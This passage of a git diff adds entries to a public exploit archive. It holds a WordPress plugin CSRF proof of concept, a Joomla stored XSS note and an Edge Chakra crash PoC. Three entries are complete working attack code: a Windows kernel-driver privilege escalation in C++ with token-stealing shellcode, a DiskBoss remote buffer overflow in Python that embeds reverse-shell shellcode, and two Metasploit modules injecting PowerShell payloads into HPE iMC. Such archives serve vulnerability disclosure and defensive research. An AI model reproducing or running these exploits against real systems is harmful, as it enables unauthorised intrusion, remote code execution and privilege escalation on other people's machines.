 if(!$r->success || !$r->body == '0'){
     ExitCodes::exitWithFailed('Failed to retrieve a valid response');
 }
 ExitCodes::exitWithSuccess('Exploitation successful');
 ```
 Timeline
 --------
 1. **2017-12-12**: Discovered
 2. **2017-12-12**: Tried to contact plugin author through WordPress.org
 support threads
 3. **2017-12-13**: Tried to contact plugin author by creating an issue
 in plugin's repository on Github
 4. **2017-12-13**: Vendor replied
 5. **2017-12-14**: Vendor received details
 6. **2018-01-07**: Patch released
--- a/exploits/php/webapps/43487.txt
+++ b/exploits/php/webapps/43487.txt
@ -0,0 +1,57 @@
 * Exploit Title: WordPress Download Manager [CSRF]
 * Discovery Date: 2017-12-12
 * Exploit Author: Panagiotis Vagenas
 * Author Link: https://twitter.com/panVagenas
 * Vendor Homepage: https://www.wpdownloadmanager.com/
 * Software Link: https://wordpress.org/plugins/download-manager
 * Version: 2.9.60
 * Tested on: WordPress 4.9.1
 * Category: WebApps, WordPress
 Description
 -----------
 Plugin implements the AJAX action `wpdm-install-addon` which calls the
 function `wpdm_install_addon`. This function doesn't take any anti-CSRF
 measures thus making it susceptible to those kind of attacks.
 What is interesting about this function though, is the fact that it
 provides plugin installation functionality for admin users. The origin of
 the package is defined by the `$_REQUEST['addon']` if is set without any
 validation.
 A malicious actor can exploit this to install a malicious plugin in the
 vulnerable site. In fact the install package doesn't need to be a valid
 plugin, it could just contain malicious code. Because the package is
 extracted in the `/wp-content/plugins/` dir without changing it's original
 folder structure, an attacker could leverage the CSRF to upload malicious
 code and execute the code on the infected server.
 PoC
 ---
 ```
 <pre class="lang:html decode:true "><form method="post" action="http://vuln.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpdm-install-addon">
    <label> This is the remote url to get plugin from. Everything is valid as long as it's a ZIP archive and ends with .zip
        <input type="text" name="addon" value="https://downloads.wordpress.org/plugin/bbpress.2.5.13.zip">
    </label>
    <button type="submit" value="Submit">Submit</button>
 </form>
 ```
 Solution
 --------
 Update to version 2.9.61.
 Timeline
 --------
 1. **2017-12-12**: Discovered
 2. **2017-12-14**: Tried to reach out to vendor using support email address
 3. **2017-12-16**: Vendor replied
 4. **2017-12-16**: Vendor received details
 5. **2017-12-21**: Vendor released a fix
--- a/exploits/php/webapps/43488.txt
+++ b/exploits/php/webapps/43488.txt
@ -0,0 +1,21 @@
 # Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
 # Date: 06-01-2018
 # Software Link: https://stackideas.com/easydiscuss
 # Exploit Author: Mattia Furlani
 # CVE: CVE-2018-5263
 # Category: webapps
 1. Description
 Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20
 2. Proof of Concept
 Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed
 3. Solution:
 Update to version 4.0.21
 https://stackideas.com/blog/easydiscuss4021-update
--- a/exploits/windows/dos/43491.js
+++ b/exploits/windows/dos/43491.js
@ -0,0 +1,28 @@
 /*
 The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
 Here's a snippet of the method.
 void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
 {
    ...
    IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
    ...
    InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
    ...
 }
 At (a), there's no check for integer overflow.
 Note: Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug.
 PoC:
 */
 let a = '';
 let b = 'A'.repeat(0x10000);
 for (let i = 0; i < 0x10000; i++) {
    a = 'BBBBBBBBB' + a + b;
 }
 print(a.length);
 print(b.length);
 print(a[0]);
--- a/exploits/windows/local/43494.cpp
+++ b/exploits/windows/local/43494.cpp
@ -0,0 +1,322 @@
 // ConsoleApplication1.cpp : Defines the entry point for the console application.
 //
 #include "stdafx.h"
 #include <Windows.h>
 #include <winioctl.h>
 #define device L"\\\\.\\WINDRVR1251"
 #define SPRAY_SIZE 30000
 typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PULONG AllocationSize,
    ULONG AllocationType,
    ULONG Protect
    );
 // Windows 7 SP1 x86 Offsets
 #define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
 #define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
 #define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
 #define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
 #define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
 #define SYSTEM_PID        0x004    // SYSTEM Process PID
 /*
 * The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.
 */
 __declspec(naked) VOID TokenStealingShellcode() {
    __asm {
       hasRun:
             xor eax, eax; Set zero
             cmp byte ptr [eax], 1; If this is 1, we have already run this code
             jz End;
             mov byte ptr [eax], 1; Indicate that this code has been hit already
            ; initialize
            mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
            mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process
            mov ecx, eax; Copy current _EPROCESS structure
            mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
            mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4
            ; begin system token search loop
            SearchSystemPID :
        mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID
            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process
            End :
        ret 0x10; cleanup for cdecl
    }
 }
 BOOL map_null_page()
 {
    /* Begin NULL page map */
    HMODULE hmodule = LoadLibraryA("ntdll.dll");
    if (hmodule == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't get handle to ntdll.dll\n");
        return FALSE;
    }
    PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
    if (AllocateVirtualMemory == NULL)
    {
        printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
        return FALSE;
    }
    SIZE_T size = 0x1000;
    PVOID address = (PVOID)0x1;
    NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
        &address,
        0,
        &size,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);
    if (allocStatus != 0)
    {
        printf("[x] Error mapping null page\n");
        return FALSE;
    }
    printf("[+] Mapped null page\n");
    return TRUE;
 }
 /*
 * Continually flip the size
 * @Param user_size - a pointer to the user defined size
 */
 DWORD WINAPI flip_thread(LPVOID user_size)
 {
    printf("[+] Flipping thread started\n");
    while (TRUE)
    {
        *(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
    }
    return 0;
 }
 DWORD WINAPI ioctl_thread(LPVOID user_buff)
 {
    char out_buff[40];
    DWORD bytes_returned;
    HANDLE hdevice = CreateFile(device,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0
    );
    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't open device\n");
    }
    NTSTATUS ret = DeviceIoControl(hdevice,
        0x95382623,
        user_buff,
        0x1000,
        out_buff,
        40,
        &bytes_returned,
        0);
    CloseHandle(hdevice);
    return 0;
 }
 void spray_pool(HANDLE handle_arr[])
 {
    //create SPRAY_SIZE event objects filling up the pool
    for (int i = 0; i < SPRAY_SIZE; i++)
    {
        handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
    }
    for (int i = 0; i < SPRAY_SIZE; i+=50)
    {
        for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
        {
            CloseHandle(handle_arr[j + i]);
            handle_arr[j + i] = 0;
        }
    }
 }
 void free_events(HANDLE handle_arr[])
 {
    for (int i = 0; i < SPRAY_SIZE; i++)
    {
        if (handle_arr[i] != 0)
        {
            CloseHandle(handle_arr[i]);
        }
    }
 }
 BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
 {
    HANDLE htoken;
    DWORD length;
    DWORD temp;
    DWORD new_count;
    PTOKEN_PRIVILEGES current_priv = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
    {
        printf("[x] Couldn't get current token\n");
        return FALSE;
    }
    //get the size required for the current_priv allocation
    GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);
    //allocate memory for the structure
    current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
    //get the actual token info
    GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
    new_count = current_priv->PrivilegeCount;
    HeapFree(GetProcessHeap(), 0, current_priv);
    CloseHandle(htoken);
    temp = old_count;       //store the old count
    *updated_count = new_count; //update the count 
    if (new_count > old_count)
    {
        printf("[+] We now have %d privileges\n", new_count);
        return TRUE;
    }
    else
        return FALSE;
 }
 int main()
 {
    HANDLE h_flip_thread;
    HANDLE h_ioctl_thread;
    HANDLE handle_arr[SPRAY_SIZE] = { 0 };
    DWORD mask = 0;
    DWORD orig_priv_count = 0;
    char *user_buff;
    check_priv_count(-1, &orig_priv_count);
    printf("[+] Original priv count: %d\n", orig_priv_count);
    if (!map_null_page())
    {
        return -1;
    }
    *(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;
    user_buff = (char *)VirtualAlloc(NULL,
        0x1000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_NOCACHE | PAGE_READWRITE);
    if (user_buff == NULL)
    {
        printf("[x] Couldn't allocate memory for buffer\n");
        return -1;
    }
    memset(user_buff, 0x41, 0x1000);
    *(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x51
    //pool header block
    *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
    *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
    //QuotaInfo block
    *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
    *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
    *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
    *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
    //Event header block
    *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
    *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
    *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
    *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
    *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
    *(ULONG *)(user_buff + 0x400) = 0x00000000;
    *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
    /*
    * create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
    * Set its priority to highest.
    * Set its mask so that it runs on a particular core.
    */
    h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
    SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
    SetThreadAffinityMask(h_flip_thread, 0);
    ResumeThread(h_flip_thread);
    printf("[+] Starting race...\n");
    spray_pool(handle_arr);
    while (TRUE)
    {
        h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
        SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
        SetThreadAffinityMask(h_ioctl_thread, 1);
        ResumeThread(h_ioctl_thread);
        WaitForSingleObject(h_ioctl_thread, INFINITE);
        free_events(handle_arr); //free the event objects 
        if (check_priv_count(orig_priv_count, &orig_priv_count))
        {
            printf("[+] Breaking out of loop, popping shell!\n");
            break;
        }
        //pool header block
        *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
        *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
                                                   //QuotaInfo block
        *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
        *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
        *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
        *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
                                                    //Event header block
        *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
        *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
        *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
        *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
        *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
        *(ULONG *)(user_buff + 0x400) = 0x00000000;
        *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
        spray_pool(handle_arr);
    }
    system("cmd.exe");
    return 0;
 }
--- a/exploits/windows/remote/43408.py
+++ b/exploits/windows/remote/43408.py
@ -1,3 +1,5 @@
 #!/usr/bin/pythion
 # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
 # CVE: CVE-2017-17968
 # Date: 28-12-2017
@ -8,12 +10,12 @@
 # Category: webapps
 # Impact: Code execution
-1. Description
+#1. Description
-   
+#   
-A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
+#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
-   
+#   
-2. Proof of Concept
+#2. Proof of Concept
- 
+ #
 #!/usr/bin/pythion
@ -114,6 +116,6 @@ if __name__ == '__main__':
-3. Solution:
+#3. Solution:
-   
+#   
-No solution available at the moment.
+#No solution available at the moment.
--- a/exploits/windows/remote/43478.py
+++ b/exploits/windows/remote/43478.py
@ -0,0 +1,105 @@
 # Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
 # Date: 2017-08-27
 # Exploit Author: Arris Huijgen
 # Vendor Homepage: http://www.diskboss.com/
 # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
 # Version: Through 8.8.16
 # Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
 # CVE: CVE-2018-5262
 # Usage
 # 1. Update the Target section
 # 2. Update the shellcode
 # 3. Launch!
 import socket
 from struct import pack
 # Software editions (port, offset)
 free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 pro8416  = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 ult8416  = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 srv8416  = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
 ent8416  = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
 ent8512  = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
 free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 pro8816  = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 ult8816  = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 srv8816  = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
 ent8816  = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
 # Target
 host         = '127.0.0.1'
 (port, addr) = ent8816
 def main():
    # Connect
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print '[+] Connected to %s:%d' % (host, port)
    # Memory
    size = 1000
    offset = 128
    # Payload
    preret = '\xEB\x06\x90\x90'     # JMP 0x06
    ret = pack('<I', addr)          # Depending on the software edition
    pivot = '\xe9\x3f\xfb\xff\xff'  # JMP -0x4BC
    # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b '\x00'
    # Payload size: 351 bytes
    sc = (
        "\xb8\x80\xac\x48\x8f\xd9\xc4\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
        "\x52\x31\x45\x12\x03\x45\x12\x83\x45\xa8\xaa\x7a\xb9\x59\xa8"
        "\x85\x41\x9a\xcd\x0c\xa4\xab\xcd\x6b\xad\x9c\xfd\xf8\xe3\x10"
        "\x75\xac\x17\xa2\xfb\x79\x18\x03\xb1\x5f\x17\x94\xea\x9c\x36"
        "\x16\xf1\xf0\x98\x27\x3a\x05\xd9\x60\x27\xe4\x8b\x39\x23\x5b"
        "\x3b\x4d\x79\x60\xb0\x1d\x6f\xe0\x25\xd5\x8e\xc1\xf8\x6d\xc9"
        "\xc1\xfb\xa2\x61\x48\xe3\xa7\x4c\x02\x98\x1c\x3a\x95\x48\x6d"
        "\xc3\x3a\xb5\x41\x36\x42\xf2\x66\xa9\x31\x0a\x95\x54\x42\xc9"
        "\xe7\x82\xc7\xc9\x40\x40\x7f\x35\x70\x85\xe6\xbe\x7e\x62\x6c"
        "\x98\x62\x75\xa1\x93\x9f\xfe\x44\x73\x16\x44\x63\x57\x72\x1e"
        "\x0a\xce\xde\xf1\x33\x10\x81\xae\x91\x5b\x2c\xba\xab\x06\x39"
        "\x0f\x86\xb8\xb9\x07\x91\xcb\x8b\x88\x09\x43\xa0\x41\x94\x94"
        "\xc7\x7b\x60\x0a\x36\x84\x91\x03\xfd\xd0\xc1\x3b\xd4\x58\x8a"
        "\xbb\xd9\x8c\x1d\xeb\x75\x7f\xde\x5b\x36\x2f\xb6\xb1\xb9\x10"
        "\xa6\xba\x13\x39\x4d\x41\xf4\x39\x92\x49\x05\xae\x90\x49\x01"
        "\xfc\x1c\xaf\x63\x10\x49\x78\x1c\x89\xd0\xf2\xbd\x56\xcf\x7f"
        "\xfd\xdd\xfc\x80\xb0\x15\x88\x92\x25\xd6\xc7\xc8\xe0\xe9\xfd"
        "\x64\x6e\x7b\x9a\x74\xf9\x60\x35\x23\xae\x57\x4c\xa1\x42\xc1"
        "\xe6\xd7\x9e\x97\xc1\x53\x45\x64\xcf\x5a\x08\xd0\xeb\x4c\xd4"
        "\xd9\xb7\x38\x88\x8f\x61\x96\x6e\x66\xc0\x40\x39\xd5\x8a\x04"
        "\xbc\x15\x0d\x52\xc1\x73\xfb\xba\x70\x2a\xba\xc5\xbd\xba\x4a"
        "\xbe\xa3\x5a\xb4\x15\x60\x7a\x57\xbf\x9d\x13\xce\x2a\x1c\x7e"
        "\xf1\x81\x63\x87\x72\x23\x1c\x7c\x6a\x46\x19\x38\x2c\xbb\x53"
        "\x51\xd9\xbb\xc0\x52\xc8"
    )
    # Compile payload
    fill = 'A' * (offset - len(preret))
    code = fill + preret + ret + pivot
    nops = '\x90' * (size - len(code) - len(sc) - 100)
    payload = code + nops + sc + 'C' * 100
    # Compile message
    msg = (
        '\x75\x19\xba\xab' +
        '\x03\x00\x00\x00' +
        '\x00\x40\x00\x00' +
        pack('<I', len(payload)) +
        pack('<I', len(payload)) +
        pack('<I', ord(payload[-1])) + 
        payload
    )
    # Send message
    s.send(msg)
    print '[+] Exploit sent!'
 if __name__ == '__main__':
    main()
--- a/exploits/windows/remote/43492.rb
+++ b/exploits/windows/remote/43492.rb
@ -0,0 +1,207 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPE iMC dbman RestoreDBase Unauthenticated RCE',
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in
        Hewlett Packard Enterprise Intelligent Management Center before
        version 7.3 E0504P04.
        The dbman service allows unauthenticated remote users to restore
        a user-specified database (OpCode 10007), however the database
        connection username is not sanitized resulting in command injection,
        allowing execution of arbitrary operating system commands as SYSTEM.
        This service listens on TCP port 2810 by default.
        This module has been tested successfully on iMC PLAT v7.2 (E0403)
        on Windows 7 SP1 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sztivi', # Discovery
          'Chris Lyne', # Python PoC (@lynerc)
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-5817'],
          ['EDB', '43195'],
          ['ZDI', '17-341'],
          ['URL', 'https://www.securityfocus.com/bid/98469/info'],
          ['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
        ],
      'Platform'       => 'win',
      'Targets'        => [['Automatic', {}]],
      'Payload'        => { 'BadChars' => "\x00" },
      'DefaultOptions' => { 'WfsDelay' => 15 },
      'Privileged'     => true,
      'DisclosureDate' => 'May 15 2017',
      'DefaultTarget'  => 0))
    register_options [Opt::RPORT(2810)]
  end
  def check
    # empty RestoreDBase packet
    pkt = [10007].pack('N')
    connect
    sock.put pkt
    res = sock.get_once
    disconnect
    # Expected reply:
    # "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
    return CheckCode::Detected if res =~ /dbman/i
    CheckCode::Safe
  end
  def dbman_msg(database_user)
    data = ''
    db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
    database_type = "\x03" # MySQL
    restore_type = 'MANUAL'
    database_password = rand_text_alpha rand(1..5)
    database_port = rand_text_alpha rand(1..5)
    database_instance = rand_text_alpha rand(1..5)
    junk = rand_text_alpha rand(1..5)
    # database ip
    data << "\x04"
    data << [db_ip.length].pack('C')
    data << db_ip
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # junk
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x02\x01\x01"
    # database type
    data << "\x02"
    data << [database_type.length].pack('C')
    data << database_type
    # restore type
    data << "\x04"
    data << [restore_type.length].pack('C')
    data << restore_type
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # database user
    data << "\x04"
    data << "\x82"
    data << [database_user.length].pack('n')
    data << database_user
    # database password
    data << "\x04"
    data << [database_password.length].pack('C')
    data << database_password
    # database port
    data << "\x04"
    data << [database_port.length].pack('C')
    data << database_port
    # database instance
    data << "\x04"
    data << [database_instance.length].pack('C')
    data << database_instance
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x04"
    data << [junk.length].pack('C')
    data << junk
    # ???
    data << "\x30\x00"
    data << "\x02\x01\x01"
    data
  end
  def dbman_restoredbase_pkt(database_user)
    data = dbman_msg database_user
    # opcode 10007 (RestoreDBase)
    pkt = [10007].pack('N')
    # packet length
    pkt << "\x00\x00"
    pkt << [data.length + 4].pack('n')
    # packet data length
    pkt << "\x30\x82"
    pkt << [data.length].pack('n')
    # packet data
    pkt << data
    pkt
  end
  def execute_command(cmd, _opts = {})
    connect
    sock.put dbman_restoredbase_pkt "\"& #{cmd} &"
    disconnect
  end
  def exploit
    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { :remove_comspec => true, :encode_final_payload => true }
    )
    if command.length > 8000
      fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
    end
    print_status "Sending payload (#{command.length} bytes)..."
    execute_command command
  end
 end
--- a/exploits/windows/remote/43493.rb
+++ b/exploits/windows/remote/43493.rb
@ -0,0 +1,153 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPE iMC dbman RestartDB Unauthenticated RCE',
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in
        Hewlett Packard Enterprise Intelligent Management Center before
        version 7.3 E0504P04.
        The dbman service allows unauthenticated remote users to restart
        a user-specified database instance (OpCode 10008), however the
        instance ID is not sanitized, allowing execution of arbitrary
        operating system commands as SYSTEM. This service listens on
        TCP port 2810 by default.
        This module has been tested successfully on iMC PLAT v7.2 (E0403)
        on Windows 7 SP1 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sztivi', # Discovery
          'Chris Lyne', # Python PoC (@lynerc)
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-5816'],
          ['EDB', '43198'],
          ['ZDI', '17-340'],
          ['URL', 'https://www.securityfocus.com/bid/98469/info'],
          ['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
        ],
      'Platform'       => 'win',
      'Targets'        => [['Automatic', {}]],
      'Payload'        => { 'BadChars' => "\x00" },
      'DefaultOptions' => { 'WfsDelay' => 15 },
      'Privileged'     => true,
      'DisclosureDate' => 'May 15 2017',
      'DefaultTarget'  => 0))
    register_options [Opt::RPORT(2810)]
  end
  def check
    # empty RestartDB packet
    pkt = [10008].pack('N')
    connect
    sock.put pkt
    res = sock.get_once
    disconnect
    # Expected reply:
    # "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
    return CheckCode::Detected if res =~ /dbman/i
    CheckCode::Safe
  end
  def dbman_msg(db_instance)
    data = ''
    db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
    db_type = "\x04" # SQL Server
    db_sa_username = rand_text_alpha rand(1..5)
    db_sa_password = rand_text_alpha rand(1..5)
    ora_db_ins = rand_text_alpha rand(1..5)
    # dbIp
    data << "\x04"
    data << [db_ip.length].pack('C')
    data << db_ip
    # iDBType
    data << "\x02"
    data << [db_type.length].pack('C')
    data << db_type
    # dbInstance
    data << "\x04"
    data << "\x82"
    data << [db_instance.length].pack('n')
    data << db_instance
    # dbSaUserName
    data << "\x04"
    data << [db_sa_username.length].pack('C')
    data << db_sa_username
    # dbSaPassword
    data << "\x04"
    data << [db_sa_password.length].pack('C')
    data << db_sa_password
    # strOraDbIns
    data << "\x04"
    data << [ora_db_ins.length].pack('C')
    data << ora_db_ins
    data
  end
  def dbman_restartdb_pkt(db_instance)
    data = dbman_msg db_instance
    # opcode 10008 (RestartDB)
    pkt = [10008].pack('N')
    # packet length
    pkt << "\x00\x00"
    pkt << [data.length + 4].pack('n')
    # packet data length
    pkt << "\x30\x82"
    pkt << [data.length].pack('n')
    # packet data
    pkt << data
    pkt
  end
  def execute_command(cmd, _opts = {})
    connect
    sock.put dbman_restartdb_pkt "\"& #{cmd} &"
    disconnect
  end
  def exploit
    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { :remove_comspec => true, :encode_final_payload => true }
    )
    if command.length > 8000
      fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
    end
    print_status "Sending payload (#{command.length} bytes)..."
    execute_command command
  end
 end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5449,6 +5449,8 @@ id,file,description,date,author,type,platform,port
 43454,exploits/windows/dos/43454.py,"DiskBoss Enterprise 8.5.12 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,
 43456,exploits/windows/dos/43456.txt,"BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)",2018-01-08,hyp3rlinx,dos,windows,
 43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
 43490,exploits/hardware/dos/43490.txt,"Multiple CPUs - Information Leak Using Speculative Execution",2018-01-10,"Google Security Research",dos,hardware,
 43491,exploits/windows/dos/43491.js,"Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check",2018-01-10,"Google Security Research",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
